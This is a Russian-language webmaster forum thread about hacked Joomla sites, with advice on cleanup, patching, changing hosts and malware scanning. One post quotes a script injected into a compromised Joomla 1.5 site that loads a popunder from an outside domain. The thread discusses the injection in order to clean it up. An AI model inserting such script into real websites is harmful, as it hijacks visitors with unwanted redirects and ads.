Взломали несколько сайтов на Joomla 2.5.6

alexverem, вирусов я бы сказал сколько много, да нарушение сразу будет под постом). Есть еще шпионы. И т.д., и т.п. Их там дофига видов.

Нацеленные на ру-сегмент, ваще левак забугорный и т.п.

Либо сам движок.

Либо дизайн движка.

Либо дополонения.

Либо контент.

Либо просто файлы.

Короче факторов миллион.

Ваще сам движок такой, что по ним часто идут взломы. Но это не только его касается...

В чем конкретно вопрос ваш состоит? Тут надо комплексно мочить и предохраняться нерезинотехническими методами.

Этап 1. Осознать проблему

Этап 2. Начинать действовать

Какие у вас вообще последствия-то?

В 2.5.6 дыра на дыре.

Надо вычищать, обновлять (если сложно, то патчи накатывать).

Ну и проверить на уязвимости и прочее остальное.

В двух словах не описать, пару статеек писал в блоге

kxk, да я знаю. Но я использую Nginx и там это делается элементарно. А вообще, к сожалению ТС сам виноват. Я бы на его месте всегда бы делал просто HTML версию сайта.

Хотя кого я обманываю? Я бы не использовал Joomla.

Был проблемный сайт с вирусами ( перекидывали на казино) раз в неделю удалял скрипт, но хулиганы или прога заливали все вновь и вновь. Закрыл все папки и т.д но они меняли права и заливали скрипт снова.

Написал хостеру просьбу заблокировать доступ по ssh отказали обосновав пользуйтесь новым тарифом. Помучился и на свой страх и риск предложил клиенту поменять хостера и вуаля уже год нет проникновений.

Всем большое спасибо за ответы.. т.е. каждый раз создавать текстовый файл, писать там статью, заливать, а потом в сайдбаре например или на главной вручную добавлять ссылку на эту статью?

Или я что-то не так понял?

---------- Добавлено 05.12.2017 в 12:27 ----------

Хостера поменяли я не совсем понял почему, потому не разрешали заблокировать доступ по ssh а на новом заблокировали?

---------- Добавлено 05.12.2017 в 12:28 ----------

У вас в подписи "Если постоянно взламывают движок, достаточно сменить хостинг", а чем это поможет?

---------- Добавлено 05.12.2017 в 12:31 ----------

Нашел еще один взлом, на джумле 1.5.. там при клике по меню открывается попандер.. я посмотрел в коде добавлен скрипт

<script>

var popunder = {expire: 12,url: "http://yourprizeishere21.com/?u=y1hwkwf&o=2a7bzvf"};

</script>

<script src="http://yourprizeishere21.com/js/popunder.js"></script>    

Интересно это налету вставляется (читал как то через MySQL), или где то изменен файл сайта на сервере?

Поможет, он фильтрует post-запросы, которые использую для шеллов. Впрочем если уже вставлена реклама, дор или учетки админа, то не поможет.

ЗЫ Ссылка была битая, поправил

Можно ай-болитом просканировать, он обычно много чего находит